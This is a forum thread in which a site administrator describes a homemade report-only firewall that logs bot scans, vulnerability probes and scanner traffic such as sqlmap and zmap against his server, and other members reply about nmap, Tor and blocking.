Suspicious Request Tracking

Azareal

Azareal

Paragon
Joined
Dec 18, 2010
Messages
1,680
Reaction score
353
FP$
4,498
A couple of years ago, I got bored and decided to throw together a crude report only web application firewall which basically logged away every suspicious request it detected. I also threw together a nice little graph so I could chart it all out

It's not great for actual security, as WAFs are generally terrible at anything related to security, but it's nice to see what the bots are up-to and to get some debug data from the occasional misbehaving browser or crawler.

Back in the day of 2018, I would get the occasional bot blasting me with 1K requests per second looking for vulnerabilities and not even bothering to conceal it's identity (lol), but it seems they're a bit more subtle now.

Have you ever been curious about what suspicious or malicious activity has been hitting your site? How do you track it? Raw logs? WAF?
 
Have you been hit with nmap? Those are fun to run. I always run them with the discrete flag so the requests conceal themselves so my actual IP isn't released, because that's dumb. I mean I always use an VPN or TOR, so it's whatever but yeah.
 
Lucky! said:
Have you been hit with nmap? Those are fun to run. I always run them with the discrete flag so the requests conceal themselves so my actual IP isn't released, because that's dumb. I mean I always use an VPN or TOR, so it's whatever but yeah.
Click to expand...
https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=1.1.1.1
Tor is really easy to detect and block, not that I really bother lol

From the looks of it, sqlmap the most useless thing in the world against prepared statements came by once, it has some of the most distinctive looking requests ever.
Bots that look for Wordpress also came by (lol, I don't run Wordpress), as-well as ones which seem to fuzz random inputs.

zmap (sort of like nmap) also tended to come by very frequently along with it's app level partner zgrab, which even has it's own analytics pane.
There are also plenty of ones which squeak bits of shell code into headers, etc. probably trying to go after old Apache vulnerabilities.

I tried running nmap against myself once a year ago, but it got eaten by the firewall, kind of unfortunate.
I used to get an avalanche of bots firing off all sorts of malformed requests, but most of them seem to be getting blocked now.

Kinda boring in a way, malicious bots are one of the few fun things to watch when administering a server.
 
Last edited:
You must log in or register to reply here.

About Us

Since 2007, Forum Promotion has specialized in providing advertising solutions to webmasters looking to promote their communities. We pride ourselves in being the bridge that connects forum administrators, bloggers, and more.

Sponsors

Affiliates

    Universal Gaming The Coffee House

Stay Connected

Back
Top Bottom